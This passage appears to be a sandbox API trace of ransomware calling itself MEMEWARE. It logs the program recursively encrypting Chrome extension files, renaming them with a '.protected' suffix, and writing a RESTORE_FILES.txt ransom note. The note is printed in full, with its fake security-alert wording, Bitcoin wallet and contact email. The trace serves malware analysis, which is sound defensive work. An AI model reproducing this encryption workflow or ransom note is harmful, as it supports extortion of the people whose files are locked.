[0081.319] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0081.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.319] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0081.319] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.319] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0081.320] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0081.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.321] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0081.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.321] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0081.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.321] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0081.321] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x310, lpOverlapped=0x0) returned 1 [0081.331] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffcf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.331] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x310, lpOverlapped=0x0) returned 1 [0081.332] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.332] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0081.332] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0081.332] CloseHandle (hObject=0x160) returned 1 [0081.332] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.protected") returned 153 [0081.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.protected")) returned 1 [0081.333] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0081.333] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned 138 [0081.333] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0081.333] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0081.333] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*") returned 140 [0081.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0081.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.335] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.335] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.335] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\.") returned 140 [0081.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.335] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.336] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.336] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.336] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.336] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\..") returned 141 [0081.336] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.336] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.336] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0081.336] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar") returned 141 [0081.336] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0081.336] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0081.336] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*") returned 143 [0081.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.337] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.337] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.337] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.337] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.337] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.337] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\.") returned 143 [0081.337] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.337] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.337] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.338] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.338] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.338] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.338] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.338] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\..") returned 144 [0081.338] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.338] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.338] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.338] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.338] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.338] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.338] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.339] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.340] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.340] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.340] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x138, lpOverlapped=0x0) returned 1 [0081.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffec8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.341] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x138, lpOverlapped=0x0) returned 1 [0081.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.341] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.341] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.341] CloseHandle (hObject=0x168) returned 1 [0081.342] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.protected") returned 165 [0081.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.protected")) returned 1 [0081.343] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.343] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.343] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0081.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.343] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.343] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.344] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.345] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.345] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.345] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.345] CloseHandle (hObject=0x164) returned 1 [0081.345] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0081.345] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg") returned 141 [0081.345] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0081.345] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0081.345] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*") returned 143 [0081.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.346] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.346] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.346] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.346] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.346] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\.") returned 143 [0081.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.346] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.346] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.346] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.346] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.346] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\..") returned 144 [0081.346] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.346] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.347] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 